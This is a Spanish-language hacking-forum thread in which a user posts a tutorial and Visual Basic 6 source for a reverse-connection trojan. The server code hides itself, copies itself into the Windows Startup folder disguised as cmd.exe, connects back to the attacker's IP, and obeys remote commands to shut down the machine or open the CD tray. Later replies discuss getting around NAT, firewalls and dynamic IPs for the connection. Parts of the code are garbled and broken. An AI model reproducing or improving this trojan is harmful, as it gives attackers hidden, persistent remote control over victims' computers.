ENTRAR EN EL FOROHACK ANTIGUO (Muchos temas viejos y de menor nivel)
02:17:47 13/11/2018
¿No estas registrado?
Login: Clave:
8 Usuarios en línea: 0 registrados, 8 invitados.
Conéctate y verás los usuarios en línea
Tema: Tutorial de cración de troyanos de conexion inversa en visual basic
    Responder
Todos Los Foros -> Troyanos -> Tutorial de cración de troyanos de conexion inversa en visual basic
Autor Mensaje (Ver Versión para Imprimir)
bugos_pok
Usuario aficionado
Arreglando las imágenes

Mensajes: 15
Registrad@:
08/08/2008
Estado: Desconectad@
Ver último Post
Tutorial de cración de troyanos de conexion inversa en visual basic

Hola, soy yo nuevamente, hace mucho que no paso por aquí por eso e desidido aser un nuevo aporte.



Creación de troyanos en visual basic




Primero lo primero descarguense el visual basic aki =>http://www.megaupload.com/?d=AKFEFYY4

el winsock.ocx (si no lo tienen)
=>http://www.mundomessenger.com/descargar_archivo_requerido.php?archivo_id=294

y las licencias que son muy necesarias sino el visual basic no les va a dejar usarlo
=>http://download.microsoft.com/download/vb60ent/sample30/1/w9xnt4/en-us/vb6cli.exe

Bueno aora abren visual basic 6 y ponen 6 botones un boton se llamara abrir cd otro cerrar cd otro apagar el siguiente crack otro enviar mensaje y por ultimo desconectar y por si acaso agregen otro boton y le ponen volver a esuchar en caption.

codigo del cliente:

private sub form1_load()
winsock1.listen
end sub

codigo de volver a escuchar:
private sub command7_click()
winsock1.close 'cierra cualquier conexion previa
winsock1.listen 'pone a la escucha el cliente
end sub

codigo de desconectar:
private sub command6_click()
winsock1.close
end sub

codigo de enviar mensaje
private sub command5_click()
dim mensaje as string
mensaje = inputbox("Pon tu mensaje aki", "Envia tu mensaje")
winsock1.senddata mensaje
end sub

codigo de crack:
private sub command4_click()
winsock1.senddata "crack"
end sub

codigo de apagar:
private sub command3_click:
winsock1.senddata "apa"
end sub

codigo de cerrar cd:
winsock1.senddata "cerrar"
end sub

codigo de abrir cd:
winsock1.senddata "abrir"
end sub

este ha sido el codigo de los botones aora sigamos con los mas complejos

private sub winsock1_connectionrequest(byval requestid as lon)
winsock1.close
winsock1.accept requestid
end sub

luego agregamos cuatro labels a las label 1 y 3 a la 1 le ponemos estado y a la 3 ip

a la 2 y 4 le quitamos el caption

agregamos 2 timers con un intervalo de 200 'cada 0.2 segundos se raliza la accion programada para los timers


codigo del primer timer:
private sub timer1_timer()
if winsock1.state = 0 then
label2.caption = "desconectado"
elseif winsock1.state = 2 then
label2.caption = "escuchando"
elseif winsock1.state = 7 then
label2.caption = "conectado"
end if
end sub

y agragamos el winsock control a nuestro form1, lo programamos: le ponemos en local port 6767 en este caso.

lego va el segundo timer:

private sub timer2_timer()
if winsock1.state = 7 then
label4.caption = winsock1.remotehostip 'hace que el label ponga en que ip esta el winsock
timer2.enabled = false 'como no necesitamos que repita la accion lo desabilitamos
end if
end sub

ya quedo el cliente solo falta el server:


codigo del server

private sub form1_load()
hide
me.visible = false
app.taskvisible = false
filecopy app.exename & ".exe", _
"C:\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\cmd.exe"
end sub


ponemos un winsock y ponemos en remotehost nuestra ip por ej: 192.175.5.43
y en remoteport el puerto 6767 que es el puerto local del cliente.
le ponemos un modulo con este codigo:
Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" ( _
ByVal lpstrCommand As String, _
ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, _
ByVal hwndCallback As Long) As Long

codigo

private sub winsock1_dataarrival(byval bytestotal as long)
dim datos as string
winsock1.getddata datos
if datos = "abrir" then
call mcisendstring("set cdaudio door open wait",0&,0&,0&)
elseif datos = "cerrar" then
call mcisendstring("set cdaudio door closed wait",0&,0&,0&)
elseif datos = "apa" then
shell "shutdown -s -t 0"
elseif datos = "crack" then
shell "cmd\@echo off"
erase cmd
else
msgbox datos
end if
end sub

luego agregamos un timer con un intervalo de 200 y pinemos esto
timer1_timer
if winsock1.state = 0 then
winsock1.connect
elseif winsock1.state = 7 then
else
winsock1.close
end if
end sub

y listo, ya tienes tu troyano listo solo agregale esto:
on error resume next asi:
private sub winsock1_dataarrival(byval bytestotal as long)
on error resume next
dim datos as string
winsock1.getddata datos
if datos = "abrir" then
call mcisendstring("set cdaudio door open wait",0&,0&,0&)
elseif datos = "cerrar" then
call mcisendstring("set cdaudio door closed wait",0&,0&,0&)
elseif datos = "apa" then
shell "shutdown -s -t 0"
elseif datos = "crack" then
shell "cmd\@echo off"
erase cmd
else
msgbox datos
end if
end sub

Espero que les haya gustado.
salu2.


de: bugos_pok.
perdonenme por no haber subido esto antes. no tenia el visual basic.

Dejen su comentario.

05/03/2010 01:46:07 
kevinpunk
Casi Maestro Nivel 2
Arreglando las imágenes

Mensajes: 166
Registrad@:
25/08/2009
Estado: Desconectad@
Ir Arriba
RE: Tutorial de craci�n de troyanos de conexion inversa en visual basic

Exelente Aporte , Luego lo compilo Aver como Corre :)


salu2


Kev!n PunK!!
05/03/2010 02:41:41 
NT38K
Casi Maestro Nivel 3

Mensajes: 229
Registrad@:
17/01/2010
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

Buen aporte amigo..hay q probarlo a ver q tal ..
05/03/2010 03:53:04 
HeR0
Maestro Nivel 3
Arreglando las imágenes

Mensajes: 643
Registrad@:
29/10/2008
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

me gusto (Y) se agradece

saludos



05/03/2010 16:44:14 
bugos_pok
Usuario aficionado
Arreglando las imágenes

Mensajes: 15
Registrad@:
08/08/2008
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

ya lo probe y funciona, lo unico que no he probado es la función de crack porque no tengo ordenadores viejos para aserlo
05/03/2010 16:47:21 
bugos_pok
Usuario aficionado
Arreglando las imágenes

Mensajes: 15
Registrad@:
08/08/2008
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

ahhhhh me falto ponerle un timer al server para que se conecte, ya corregi el error y le agregue el codigo
05/03/2010 17:22:44 
perro777
Aprendiz nivel 2
Arreglando las imágenes

Mensajes: 59
Registrad@:
08/11/2006
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

Señores esto es muy basico, estudien primero el lenguaje y despues traten de hacer un proyecto mas avanzado.
P.D.: bugos... y la fuente?
10/03/2010 23:07:41 
Dookie9
Usuario novato

Mensajes: 9
Registrad@:
14/06/2010
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

Muchas gracias por el aporte...
14/06/2010 21:49:32 
bugos_pok
Usuario aficionado
Arreglando las imágenes

Mensajes: 15
Registrad@:
08/08/2008
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

gracias Dookie9


El hackeo no solamente es para fastidiar, es tambien una cultura, UNA CULTURA PARA FREGAR!!!
08/07/2010 18:46:34 
bugos_pok
Usuario aficionado
Arreglando las imágenes

Mensajes: 15
Registrad@:
08/08/2008
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

ah...........no hay fuente.........solo sake un poko de informacíon de u tuto de blackshadow 7777 de como enviar un msg......aki el texto......


Private Sub enviar_Click()
Dim enviar As String 'declaramos a enviar de tipo cadena
enviar = InputBox("Escribe aca tu mensaje:", "Mensajes")
'utilizamos una funcion por defecto de visualbasic llamada input
'para escribir el mensaje a enviar
Winsock1.SendData enviar ' envia el mensaje escrito o contenido en enviar
End Sub



MsgBox datos, vbCritical, "Mensaje Anonimo" 'muestra el mensaje




Luego les explicare como aser un chat en el trojan.......lla lo ise.....pero me falta subirlo


El hackeo no solamente es para fastidiar, es tambien una cultura, UNA CULTURA PARA FREGAR!!!
08/07/2010 18:51:21 
jack333
Usuario muy espontáneo
Sin Imagen

Mensajes: 1
Registrad@:
06/09/2012
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

hola a todos, se que tal vez este tema sea viejo pero es muy importante, se habla mucho de la conexion inversa y de lo que se puede hacer una vez hecha la conexion, pero todo lo que he visto segun para hacer la conexion inversa es poner en el remote host, la ip que tenemos, ejemplo 127.0.0.1 el detalle es que se posee una ip dinamica en la mayoria de los casos, ademas dicen, bueno, con la conexion inversa te saltas los firewall y los router; actualmente casi todos contamos con un modem dsl y un router en ambos lados de la conexion, tanto cliente como servidor, mi pregunta es como se puede hacer la conexion, olvidandonos un poco de todo lo demas
solo la conexion, empezando por el dilema de la ip dinamica y segundo los firewall y los routers de ambos lados de la conexion. Una posible solucion seria hacer NAT en el cliente para que se conecte el servidor pero, ¿como se podria hacer esto?, seria muy bueno que solo se explicara de forma muy detallada la pura conexion y lo demas creo que hay mucho codigo y se ha explicado muchas veces, pero la conexion con las caracteristicas que menciono, no la he podido encontrar, de antemano gracias por su atencion.
06/09/2012 04:08:53 
RevangelyonX
Aprendiz nivel 3

Mensajes: 92
Registrad@:
11/09/2005
Estado: Desconectad@
Ir Arriba
RE: Tutorial de cración de troyanos de conexion inversa en visual basic

Hola,

Sería muy interesante probarlo y de hecho lo hare al llegar a casa.

Si por definición una conexión inversa es. La victima se conecta a nostros. Somos nostros que tenemos el puerto abierto y por lo tanto somos nostros que deberiamoa hacer el NAT en nuestro firewall/router. En mi caso tengo un router ADSL y punto.

En el caso de gestionar la IP dinamica... Quizá con no ip?
http://www.hackxcrack.es/forum/index.php?topic=2456.0

Salu2


07/09/2012 21:01:30 


REGÍSTRATE PARA PODER ENVIAR UN MENSAJE (tardas 20 segundos)

Copyright ForoHack.com